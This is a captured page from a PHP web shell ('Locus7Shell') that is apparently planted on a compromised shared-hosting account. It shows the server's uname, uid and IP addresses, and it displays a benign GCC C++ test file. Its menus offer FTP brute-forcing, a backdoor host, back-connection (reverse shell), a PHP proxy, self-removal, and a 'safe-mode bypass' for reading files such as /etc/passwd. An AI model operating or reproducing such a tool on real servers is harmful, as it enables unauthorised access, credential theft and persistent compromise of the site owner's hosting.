Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/torture/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr44972.C (2.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile } */

#include<cassert>
#include<new>
#include<utility>

namespace boost {

template<class T>
class optional;

class aligned_storage
{
    char data[ 1000 ];
  public:
    void const* address() const { return &data[0]; }
    void      * address()       { return &data[0]; }
} ;


template<class T>
class optional_base
{
  protected :
    optional_base(){}
    optional_base ( T const& val )
    {
      construct(val);
    }

    template<class U>
    void assign ( optional<U> const& rhs )
    {
      if (!is_initialized())
        if ( rhs.is_initialized() )
          construct(T());
    }

  public :

    bool is_initialized() const { return m_initialized ; }

  protected :

    void construct ( T const& val )
     {
       new (m_storage.address()) T(val) ;
     }

    T const* get_ptr_impl() const
    { return static_cast<T const*>(m_storage.address()); }

  private :

    bool m_initialized ;
    aligned_storage  m_storage ;
} ;


template<class T>
class optional : public optional_base<T>
{
    typedef optional_base<T> base ;

  public :

    optional() : base() {}
    optional ( T const& val ) : base(val) {}
    optional& operator= ( optional const& rhs )
      {
        this->assign( rhs ) ;
        return *this ;
      }

    T const& get() const ;

    T const* operator->() const { assert(this->is_initialized()) ; return this->get_ptr_impl() ; }

} ;


} // namespace boost


namespace std
{

  template<typename _Tp, std::size_t _Nm>
    struct array
    {
      typedef _Tp                           value_type;
      typedef const value_type*                  const_iterator;

      value_type _M_instance[_Nm];

    };
}


class NT
{
  double _inf, _sup;
};


template < typename T > inline
std::array<T, 1>
make_array(const T& b1)
{
  std::array<T, 1> a = { { b1 } };
  return a;
}

class V
{
  typedef std::array<NT, 1>               Base;
  Base base;

public:
  V() {}
  V(const NT &x)
    : base(make_array(x)) {}

};

using boost::optional ;

optional< std::pair< NT, NT > >
  linsolve_pointC2() ;

optional< V > construct_normal_offset_lines_isecC2 ( )
{
  optional< std::pair<NT,NT> > ip;

  ip = linsolve_pointC2();

  V a(ip->first) ;
  return a;
}




Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]--